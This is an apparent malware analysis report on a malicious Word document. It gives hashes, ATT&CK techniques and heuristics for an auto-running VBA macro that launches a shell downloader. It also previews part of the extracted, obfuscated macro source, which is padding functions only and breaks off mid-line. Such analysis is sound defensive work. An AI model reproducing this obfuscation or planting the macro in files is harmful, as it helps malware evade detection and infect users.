Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c6bf1da8d7ccb15c…

MALICIOUS

Office (OLE)

170.8 KB · Created: 2018-07-24 17:43:00 · Authoring application: Microsoft Office Word · First seen: 2020-05-25
MD5: c2095c670e42f6f13b319ab79054bfb6 SHA-1: 773128e65fb3177ff43c48d71dd2e2b7b85382aa SHA-256: c6bf1da8d7ccb15cc7cab013ab5ca68d48516ce4590f07e5aed00606d4c89cad
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic · T1059 Command and Scripting Interpreter · T1204.002 Malicious File

The sample is an Office document with VBA macros. The 'Document_Open' macro is configured to execute a shell command, indicating it's designed to download and run a secondary payload. The VBA code itself is heavily obfuscated, making it difficult to determine the exact nature of the payload or its destination.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body); this is a standard OOXML schema namespace URI, consistent with the note above that the URL itself is not a detection.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32942 bytes
SHA-256: 900b5003dfdcced58d0855e160e6f7fdad802acba724b371d6d52a6eb4da0d3f
Preview script
First 1,000 lines of the extracted script
' Module attributes as emitted by the extractor (oletools.olevba.extract_macros,
' decoded VBA source). VB_Base = "1Normal.ThisDocument" and VB_PredeclaredId = True
' mark this as the document module itself (the same module the report's
' Document_Open finding refers to); the module name "aTTvjKo" is a random-looking
' string, consistent with the obfuscation described in the report.
Attribute VB_Name = "aTTvjKo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Obfuscated helper from the extracted macro module (macros.bas).
' Every name it touches (AiEndd, oTnIO, jNHLY, ...) is used without a Dim in this
' listing, and no Option Explicit precedes the first function here, so VBA would
' bind them as implicit Variants; whether any of them is defined elsewhere in the
' 32,942-byte module is not visible in this excerpt. The function name is never
' assigned, so the call returns the Variant default. None of the visible branches
' calls Shell, references the document or reaches a URL, so the OLE_VBA_SHELL
' finding must originate outside the lines shown.
' NOTE(review): looks like obfuscation padding (seven identical compare /
' Set / arithmetic triples sharing the literal 321438563) — confirm against
' the full module before treating it as inert.
Private Function EvuWAHzJozJAtG()
' Any runtime error in the arithmetic below (for example a divisor that is still
' Empty) is suppressed and execution continues with the next statement.
On Error Resume Next
   ' Each block compares an unbound name with 11, then either Sets an object
   ' reference or evaluates arithmetic over further unbound names. The same
   ' shape repeats for the remaining six blocks.
   If AiEndd >= 11 Then
      Set XQPPz = oTnIO
      jNHLY = OnjwwT - 321438563
      Else
      dalRS = fwGnii * CcVvN - XYfjs / foOql + (SwCVh + BUNjT)
   End If
   If YErnAj >= 11 Then
      Set fDNaS = lWRvWz
      vTKhsW = iBUKho - 321438563
      Else
      ZTtAu = saLGC * rRFpQ - JCjFtK / ikkdjD + (dWMDYu + noVIDi)
   End If
   If clsAs >= 11 Then
      Set bioRTJ = jiQhJi
      HzLuT = zhfvB - 321438563
      Else
      RBGjhw = ETPhj * piHTsS - baLiaw / UBtwsP + (sdazjj + ZsrPc)
   End If
   If iBIGGn >= 11 Then
      Set lVruw = tfanXK
      WtdcHi = Vqfio - 321438563
      Else
      iPqHju = jRmtA * iKhpzL - fQoYj / XkoupM + (PUdpT + cHLFG)
   End If
   If djHwl >= 11 Then
      Set kltvo = rsumHQ
      UOLiP = vRusro - 321438563
      Else
      CJPqY = dXAnYA * XpLGi - TNIKR / sQpAqs + (Hkvhc + NQniT)
   End If
   If sqOncR >= 11 Then
      Set qqcGiQ = CaQoTv
      BjVJjh = iTOzs - 321438563
      Else
      cLfLQ = tCmwrA * SWSaa - LhrJs / tjwIXN + (qNIru + YUBuO)
   End If
   If IRPjQs >= 11 Then
      Set ojVlBm = WOwtPk
      KFJiXV = oJncb - 321438563
      Else
      VcUQs = aTJrXq * YBFFA - zvwLFB / XlAWiI + (YLuujB + KPANmo)
   End If
End Function
' Second obfuscated helper; structurally a copy of EvuWAHzJozJAtG with fresh
' random-looking names. Seven blocks, each comparing an undeclared name with 11,
' then either a Set of one unbound name to another or an arithmetic expression
' over unbound names; the literal 321438563 appears in every block. No Dim and no
' Option Explicit are visible before this point, so the names would be implicit
' Variants unless the rest of the module (not shown) declares them. The function
' name is never assigned. No Shell call, document access or URL appears here.
' NOTE(review): looks like padding; its only plausible purpose is to dilute
' static signatures — verify against the full module.
Private Function vwwUAHXSisrDqT()
' Errors raised by the arithmetic (e.g. division by an Empty operand) are
' swallowed and execution proceeds to the next statement.
On Error Resume Next
   If FShWW >= 11 Then
      Set Dzqsmw = mVHVD
      FrUIJQ = KWzuNW - 321438563
      Else
      YwTfnJ = Jwvda * QBENj - MTjkJ / FiZjz + (iQOApB + hulvtZ)
   End If
   If uWDDN >= 11 Then
      Set WSBdW = zWINO
      HQJFwl = iDvin - 321438563
      Else
      uNTilj = jncjT * kAUHk - oKMTJo / StjDb + (NDcJin + hszTo)
   End If
   If WaCijK >= 11 Then
      Set rAXtZ = EhSWK
      FApCzV = dHBNn - 321438563
      Else
      dowzvi = tiWdT * XXTtT - itJcjY / IIjCp + (kRvfGh + snrad)
   End If
   If jMRBA >= 11 Then
      Set FrlzO = BUBNZA
      HDbLA = BvEKJ - 321438563
      Else
      WSAMB = IfRlNQ * FwPsMX - SjnDIA / kwWAh + (jsSBHz + QVFVqK)
   End If
   If jwAJOi >= 11 Then
      Set EhUMR = sVOMch
      jBbsNL = DvBizU - 321438563
      Else
      WJHWoH = fjaSo * iWYfw - VziXIw / mNJjm + (zlVMH + nZVERA)
   End If
   If HYIRmL >= 11 Then
      Set JPsMKH = bddwzw
      uPMDl = TaYnK - 321438563
      Else
      owJQPN = fGzIcr * ATISv - jZNIw / AKfjr + (BfTjR + NkQSD)
   End If
   If ZAIKvL >= 11 Then
      Set zPiuK = LOczkB
      GTIrqU = wwLtf - 321438563
      Else
      DzRlYI = iNouO * tLSPB - nffGsR / azIDD + (OiqMwr + blSsi)
   End If
End Function
' Third obfuscated helper, same template as the two functions above but with
' four blocks instead of seven. Every identifier is undeclared in this listing
' (no Dim, no visible Option Explicit), the literal 321438563 recurs in each
' block, and the function name is never assigned, so the call returns the
' Variant default. Nothing here calls Shell, touches the document or reaches a
' URL; the report's shell/auto-exec findings must come from code beyond the
' 185 lines shown.
' NOTE(review): looks like signature-dilution padding — confirm in the full module.
Private Function mDsmTvpiw()
' Runtime errors in the arithmetic below are suppressed; execution continues.
On Error Resume Next
   If SYjul >= 11 Then
      Set pzNfOl = tZzaR
      wYWSL = IvInC - 321438563
      Else
      EEwLso = kKVdh * YRistz - NjFcw / Ubckj + (KrKhO + hJPjDc)
   End If
   If RzSIDo >= 11 Then
      Set qoHJk = OTiXzL
      KhCXO = QjSGzO - 321438563
      Else
      zlCVkl = hSYiwZ * IcQGZ - Qijwuu / XZXhI + (tocRNm + cYsJY)
   End If
   If iIDBAa >= 11 Then
      Set bRBGb = RLIuqW
      jPfLD = LOrqa - 321438563
      Else
      VFqOV = hhYRX * KlwzRP - SBVIOd / wjPIjb + (hFkawm + JpiOs)
   End If
   If fnBdCO >= 11 Then
      Set naVwVP = TjIaoR
      vOkPK = ozjfc - 321438563
      Else
      HZhawh = VXRpi * SupjYc - cRkZQN / DBotpW + (INmIJt + wzdZC)
   End If
End Function
Private Function XOwbsIWzz()
On Error Resume Next
   If uuwFq >= 11 Then
      Set RSqBD = MIUiG
      KvCiP = rojuu - 321438563
      Else
      CnmhAH = kzXBoX * mSjVT - iXzzH / ffOBi + (XCwPb + INIWKn)
   End If
   If iXASQh >= 11 Then
      Set AdfMWV = aJMruV
      qjJBL = iSKGn - 321438563
      Else
      KIzIXO = wDXlKr * wSzKIC - NnrrQ / ZMiSZ + (WKUaB + dNZUSu)
   End If
   If aOmLhq >= 11 Then
      Set HNiTzl = tnHtQ
      BFLjd = BrazR - 321438
... (truncated)